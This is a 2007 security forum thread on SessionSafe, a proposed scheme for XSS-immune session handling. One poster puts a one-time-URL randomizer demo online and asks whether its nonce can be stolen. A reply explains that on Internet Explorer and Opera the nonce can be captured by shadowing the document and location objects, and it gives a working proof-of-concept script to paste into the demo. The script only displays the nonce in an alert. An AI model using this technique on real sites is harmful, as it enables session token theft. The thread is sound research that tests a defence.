March 28, 2007

Re: SessionSafe: Implementing XSS Immune Session Handling

Posted by: majohn (IP Logged)
Date: March 08, 2007 04:46AM

ok, stop talking, let's break some code :) I found my old PoC-Code and put it (temporarily) online: [onetimeurls.databasement.net] (please notice: this is only a demo of the URLRandomizer not a full SessionSafe-PoC)

I genuinely would be interested if it is possible to steal the nonce from the url_randomizer object.

Re: SessionSafe: Implementing XSS Immune Session Handling - sla.ckers.org

Well, you can, by replacing the location object on Internet Explorer and Opera. I came to know the attack through the comments on snippets from shinichitomita’s journal. Thanks to nanto_vi-san.

Copy the below exploit onto the textarea of onetimeurls.databasement.net.

<script>
// Shadow the global `document` with a decoy whose location.href starts empty
var document = { location: { href: '' } };
(function () {
  if (document.location.href == '') {
    // Nothing has been written yet: poll again in one second
    setTimeout(arguments.callee, 1000);
  } else {
    // The randomizer wrote the nonce-bearing URL into the decoy; show it
    alert(document.location.href);
  }
})();
</script>